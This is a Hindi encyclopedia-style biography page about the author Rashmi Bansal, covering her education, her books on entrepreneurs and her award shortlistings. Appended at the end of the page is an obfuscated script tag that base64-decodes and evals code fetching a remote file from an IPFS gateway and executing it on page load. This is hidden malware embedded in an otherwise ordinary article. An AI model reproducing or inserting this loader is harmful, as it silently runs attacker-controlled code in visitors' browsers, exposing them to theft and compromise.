रश्मि बंसल

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
रश्मि बंसल

रश्मि बंसल (अंग्रेज़ी: Rashmi Bansal, जन्म- 8 मार्च, 1985, मुम्बई, महाराष्ट्र) भारत की जानीमानी लेखिका हैं। एक प्रख्यात खगोल भौतिक वैज्ञानिक की सुपुत्री रश्मि बंसल का बचपन टाटा इंस्टिट्यूट ऑफ फ़ण्डामेंटल रिसर्च में बीता। यह दक्षिणी मुम्बई के अंतिम सिरे पर स्थित है। रश्मि अपने कॉलेज के दिनों से ही किताबें लिख रही हैं और ऍमबीए की पढ़ाई पूरी करते ही उन्होंने अपना प्रकाशन समूह जेएऍम भी खोल लिया। अपनी कहानियों के लिए रश्मि बंसल बहुआयामी कथानकों की खोज में रहती हैं। इनकी महत्वपूर्ण पुस्तकें 'फॉलो एव्री रेनबो' व 'अराइज़ अवेक' इत्यादि हैं।

परिचय

रश्मी बंसल का जन्म 8 मार्च, 1985 को मुम्बई शहर में हुआ था। उनके पिता खगोल भौतिकी के वैज्ञानिक थे। उन्हिने सेंट जोसेफ़ उच्च विद्यालय और आर सी चर्च से अपनी प्रारंभिक शिक्षा हासिल की। बाद में सोफ़िया कॉलेज से अर्थशास्त्र में पदवी हासिल कर आई.आई.एम-ए एम.बी.ए. की पदवी प्राप्त की। रश्मि बंसल एक उत्तम छात्रा थीं। वे कक्षा में अव्वल आती थीं। उन्हें किताबों से बचपन से ही लगाव था। समय मिलने पर उपन्यास पढ़ा करती थीं। उनको गणित पसंद नहीं था, इसलिए उन्होंने कला विषय में अपनी आगे की पढ़ाई करने का निर्णय लिया। लोगों के निराशा ज़ाहिर करने के बावजूद रश्मी अपने नर्णय पर टिकी रहीं; क्योंकि वे जानती थीं कि वे सही मार्ग पर चल रही हैं।

रचनाएँ

अपनी पहली पुस्तक 'स्टे हंगरी, स्टे फुलिश' (Stay hungry, Stay Foolish) का विषय आई.आई.एम, अहमदाबाद के सी.आई.आई.ई के प्रोफेसर राकेश बसंत से मिला। इस पुस्तक में उन्होंने 25 उद्यमीयों के जीवन के संघर्ष और सफलता की कहानियाँ लिखी हैं। यह किताब अत्यंत लोकप्रिय हुई और इसकी 35 हज़ार से ज्यादा कॉपियाँ बिकीं। इस पुस्तक को आठ भाषाओं में अनुवाद भी किया गया है। उनकी पुस्तक 'कनेक्ट द डॉट्स' (Connect The Dots) ऐसे 20 उद्यमीयों के जीवन संघर्ष की कहानी है जिन्होंने खुद मेहनत करके सफलता हासिल की है। इस पुस्तक की एक लाख कॉपियाँ बिकीं। उनकी पुस्तक 'अराइज अवॉक' (Arise Awake) ऐसे छात्रों के जीवन पर प्रकाश डालती है जिन्होंने कॉलेज में रहते खुद कंपनी शुरू की।

सम्मान

रश्मी बंसल को 2010 में इकोनॉमिक क्रॉसवर्ड पॉपुलर अवॉर्ड' जैसे प्रतिष्ठित सम्मान के लिए शोर्टलिस्ट किया गया था। 2012 में भी 'आई हेव ए ड्रीम' के लिए उन्हें इस पुरस्कार के लिए शोर्टलिस्ट किया गया था।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>